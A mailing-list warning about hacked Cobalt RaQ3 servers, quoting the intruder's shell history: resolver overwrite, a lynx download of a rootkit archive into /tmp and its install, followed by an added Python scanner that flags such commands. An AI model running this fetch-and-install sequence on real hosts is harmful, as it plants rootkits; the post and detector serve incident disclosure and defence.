
[cobalt-security] A hacker at work



Just for information, a couple of our customers' RaQ3s were hacked last
night, quite a nasty little hack (installs Koh roottools).   If you suspect
the same then check the .bash_history file in the root directory... this is
what we had in there:

(lddj]ge}xxCJ~=J'(~wBLp
./2%6ldj]ge}xxCJ~=J(~wBLpt{kL'*x9B
(lddj]ge}xxCJ~=J'(~wBLp
./2%6ldj]ge}xxCJ~=J(~wBLpt{kL'*x9B
(lddj]ge}xxCJ~=J'(~wBLp
./2%6ldj]ge}xxCJ~=J(~wBLpt{kL'*x9B
ifcofnig -a
echo "nameserver 205.136.127.200" > /etc/resolv.conf;
echo "nameserver 207.126.96.162" >> /etc/resolv.conf;
echo "nameserver 208.231.1.34" >> /etc/resolv.conf;
cd /tmp; export TERM=vt100; lynx -dump
ftp://xxxx:xxxxx@xxxxxxxxxxxxx/www/n/nk.tgz > nk.tgz; tar -xvzf nk.tgz; cd
rk 2>&1; ./ps 2>&1
./install2

I have hashed out the ftp bit, but the guy left us with his ftp login and
password so we are dealing with him in our own way ;o)

Regards

Gordon
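
The history check suggested in the post, as an added example (not part of the original message and not from its author): a Python scan of shell-history lines for the kinds of commands shown in the excerpt. The rule labels, regexes and function names are this example's own choices, and the sample rejoins the wrapped download command onto one line as an assumption about the raw file.

```python
import re

# Rules modelled on the commands in the history excerpt above. The labels and
# regexes are this example's own choices, not a vendor signature set.
RULES = [
    ("resolver config overwritten", re.compile(r">>?\s*/etc/resolv\.conf\b")),
    ("credentials embedded in download URL",
     re.compile(r"\b(?:ftp|https?)://[^\s/:@]+:[^\s/@]+@")),
    ("archive unpacked", re.compile(r"^tar\s+-?\w*x")),
    ("local binary named like a system tool",
     re.compile(r"^\./(?:ps|ls|netstat|top|ifconfig|login|find|du)\b")),
    ("installer run from working directory", re.compile(r"^\./install\w*")),
]
WORLD_WRITABLE = ("/tmp", "/var/tmp", "/dev/shm")

# Constructed sample: the readable lines of the excerpt, with the wrapped
# download command rejoined onto one line (an assumption about the raw file).
SAMPLE = [
    "ifcofnig -a",
    'echo "nameserver 205.136.127.200" > /etc/resolv.conf;',
    'echo "nameserver 207.126.96.162" >> /etc/resolv.conf;',
    "cd /tmp; export TERM=vt100; lynx -dump ftp://xxxx:xxxxx@xxxxxxxxxxxxx"
    "/www/n/nk.tgz > nk.tgz; tar -xvzf nk.tgz; cd rk 2>&1; ./ps 2>&1",
    "./install2",
]

def scan_history(lines):
    """Return (line_no, cwd, label, command) for every command matching a rule.
    Lines are split naively on ';' (quoted semicolons are not handled) and the
    last `cd` target is tracked, so each finding records where it was run."""
    cwd, findings = "?", []
    for no, line in enumerate(lines, 1):
        for cmd in filter(None, (c.strip() for c in line.split(";"))):
            moved = re.match(r"cd\s+(\S+)", cmd)
            if moved:
                target = moved.group(1)
                cwd = target if target.startswith("/") else f"{cwd.rstrip('/')}/{target}"
                continue
            findings += [(no, cwd, label, cmd) for label, rx in RULES if rx.search(cmd)]
    return findings

def run_from_world_writable(findings):
    """Findings whose working directory is under a world-writable path."""
    return [f for f in findings
            if any(f[1] == d or f[1].startswith(d + "/") for d in WORLD_WRITABLE)]

if __name__ == "__main__":
    print(*scan_history(SAMPLE), sep="\n")
```

A history file can be edited or truncated by whoever had root, so a clean result here does not clear a host.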